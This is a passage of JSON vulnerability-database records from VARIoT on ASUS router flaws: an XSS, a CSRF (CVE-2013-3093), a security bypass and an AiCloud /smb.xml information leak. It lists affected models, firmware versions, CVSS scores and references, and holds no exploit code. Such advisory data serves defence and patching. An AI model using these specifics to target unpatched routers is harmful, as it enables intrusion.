            "date": "2022-07-05T12:15:07.830000",
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "date": "2022-07-18T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-43702"
          },
          {
            "date": "2022-07-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          },
          {
            "date": "2022-07-18T15:27:57.557000",
            "db": "NVD",
            "id": "CVE-2021-43702"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-A88U Cross-Site Scripting Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-58229"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-389"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-0883

    Vulnerability from variot - Updated: 2024-08-14 14:45

    ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-0883",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_2050"
          },
          {
            "model": "rt-n15u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_16"
          },
          {
            "model": "dsl-n55u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_1397"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_979"
          },
          {
            "model": "rt-n53",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_311"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_979"
          },
          {
            "model": "rt-n10u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374_168"
          },
          {
            "model": "dsl-n55u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n10u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n15u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n53",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "cve": "CVE-2013-3093",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2013-3093",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2013-3093",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2013-3093",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-3093",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-3093",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202001-1276",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-3093",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "id": "VAR-202001-0883",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5950836471428572
      },
      "last_update_date": "2024-08-14T14:45:05.083000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.asus.com/us/"
          },
          {
            "title": "ASUS RT-N56U Fixes for cross-site request forgery vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107622"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.securityfocus.com/archive/1/531194"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3093"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "date": "2020-01-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "date": "2020-01-28T21:15:11.560000",
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          },
          {
            "date": "2020-05-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          },
          {
            "date": "2020-01-31T16:06:35.230000",
            "db": "NVD",
            "id": "CVE-2013-3093"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS\u00a0RT-N56U\u00a0 Cross-site request forgery vulnerability in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007119"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1276"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0754

    Vulnerability from variot - Updated: 2022-05-17 02:09

    Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks. ASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0754",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac56u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Kyle Lovett",
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ],
        "trust": 0.3
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple ASUS RT routers are prone to an unspecified security bypass vulnerability.\nAttackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions on the affected application. This may aid in further attacks.\nASUS RT-AC68U, RT-AC56U, RT-AC66U, RT-N66U, RT-N16 are vulnerable.",
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ],
        "trust": 0.3
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "65558",
            "trust": 0.3
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "id": "VAR-201401-0754",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.539766506
      },
      "last_update_date": "2022-05-17T02:09:50.265000Z",
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 0.3,
            "url": "https://www.asus.com/networking/rtac68u/#support"
          },
          {
            "trust": 0.3,
            "url": "https://www.asus.com/"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-06T00:00:00",
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-06T00:00:00",
            "db": "BID",
            "id": "65558"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple ASUS RT Routers Remote Security Bypass Vulnerability",
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ],
        "trust": 0.3
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input Validation Error",
        "sources": [
          {
            "db": "BID",
            "id": "65558"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-201403-0712

    Vulnerability from variot - Updated: 2022-05-17 01:51

    ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. An attacker could leverage this issue to bypass the authentication mechanism and obtain sensitive information. The following products running firmware version 3.0.0.4.374.x are vulnerable: RT-AC68U Dual-band Wireless-AC1900 Gigabit Router RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router RT-N66R Dual-Band Wireless-N900 Gigabit Router RT-N66U Dual-Band Wireless-N900 Gigabit Router RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router RT-N56R Dual-Band Wireless-AC1200 Gigabit Router RT-N56U Dual-Band Wireless-AC1200 Gigabit Router RT-N14U Wireless-N300 Cloud Router RT-N14UHP Wireless-N300 Cloud Router RT-N16 Wireless-N300 Gigabit Router RT-N16R Wireless-N300 Gigabit Router

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0712",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac56u router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n14u router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16 router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56r router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66r router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66r router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68u router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n14uhp router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16r router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u wireless router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u router",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n66r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n56r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n16r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n14uhp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac66r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac56u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          },
          {
            "db": "BID",
            "id": "65861"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "kyle Lovett",
        "sources": [
          {
            "db": "BID",
            "id": "65861"
          }
        ],
        "trust": 0.3
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-01390",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2014-01390",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01390"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
